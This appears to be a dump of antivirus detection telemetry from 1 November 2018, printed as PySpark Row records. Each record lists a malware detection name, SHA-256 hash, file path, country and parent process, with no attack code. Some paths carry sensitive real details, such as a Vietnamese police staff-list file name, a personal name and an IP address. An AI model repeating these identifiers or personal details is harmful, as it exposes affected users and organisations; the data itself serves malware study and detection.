  Row(detection=Row(filename='fav3.exe', filepath='D:\\Fav3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oldfunk.exe', filepath='D:\\OLDFUNK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ub 40.exe', filepath='D:\\ub 40.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ub 40.exe', filepath='D:\\ub 40.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diana asamoah.exe', filepath='D:\\Diana Asamoah.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dance.exe', filepath='D:\\Dance.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kuuls.exe', filepath='D:\\KUULS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav.exe', filepath='D:\\Fav.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='\\\\?\\D:\\System Volume Information\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:39:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hiplifes cool.exe', filepath='D:\\Hiplifes Cool.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diana asamoah.exe', filepath='\\\\?\\D:\\Diana Asamoah.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:36:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diana asamoah.exe', filepath='D:\\Diana Asamoah.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:34:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='D:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:34:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav.exe', filepath='\\\\?\\D:\\Fav.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav3.exe', filepath='\\\\?\\D:\\Fav3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hiplifes cool.exe', filepath='\\\\?\\D:\\Hiplifes Cool.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oldfunk.exe', filepath='\\\\?\\D:\\OLDFUNK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kuuls.exe', filepath='\\\\?\\D:\\KUULS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='live band.exe', filepath='\\\\?\\D:\\LIVE BAND.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ub 40.exe', filepath='\\\\?\\D:\\ub 40.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2wzo8rnm4l.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsrF910.tmp\\2wzo8rnm4l.exe', filesize=64000, name='HEUR/AGEN.1029958.#M1.#R1'), hash='26c730ce61d82c2715b0b3be3708f9e2fbe54b290b3d9a156dcc712fb89bd489', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:27:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='quick.exe', filepath='\\\\79.9.201.187\\Public\\server.c\\QUICK\\B\\quick.exe', filesize=1600000, name='W32/Stanit.#M1.#R1'), hash='26d452fcc6f931b8b0a31778caafbea51111e1069d41c2ee374c87e902b3e29e', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T22:33:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='273878b53a23dedfba9510ba5363c43b97211bee5d8ebf79ff506ff0691e98a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\273878B53A23DEDFBA9510BA5363C43B97211BEE5D8EBF79FF506FF0691E98A4', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='273878b53a23dedfba9510ba5363c43b97211bee5d8ebf79ff506ff0691e98a4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:02:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161627-f27fba75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161627-F27FBA75', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='2746d627a74abb289fe81c0d6089d3ba15a83f056059d2030f5a76ec124a69db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách cán bộ chiến sĩ đội csđt.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\DANH SÁCH CÁN BỘ CHIẾN SĨ ĐỘI CSĐT.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='2746d627a74abb289fe81c0d6089d3ba15a83f056059d2030f5a76ec124a69db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách cán bộ chiến sĩ đội csđt.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\DANH SÁCH CÁN BỘ CHIẾN SĨ ĐỘI CSĐT.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='2746d627a74abb289fe81c0d6089d3ba15a83f056059d2030f5a76ec124a69db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách cán bộ chiến sĩ đội csđt.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\DANH SÁCH CÁN BỘ CHIẾN SĨ ĐỘI CSĐT.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='2746d627a74abb289fe81c0d6089d3ba15a83f056059d2030f5a76ec124a69db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe110_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe110 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T06:12:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe208_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe208 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T20:24:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe472_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe472 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:20:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe617_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe617 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:04:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe201_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe201 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:19:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe659_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe659 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T21:25:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe975_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe975 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T18:17:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T22:24:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe711_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe711 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:11:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe468_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe468 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T04:09:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe863_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe863 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T05:10:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe198_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe198 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T19:23:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe297_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe297 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T13:24:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe982_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe982 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:16:14Z'), dt=datetime.date(2018, 11, 1)),
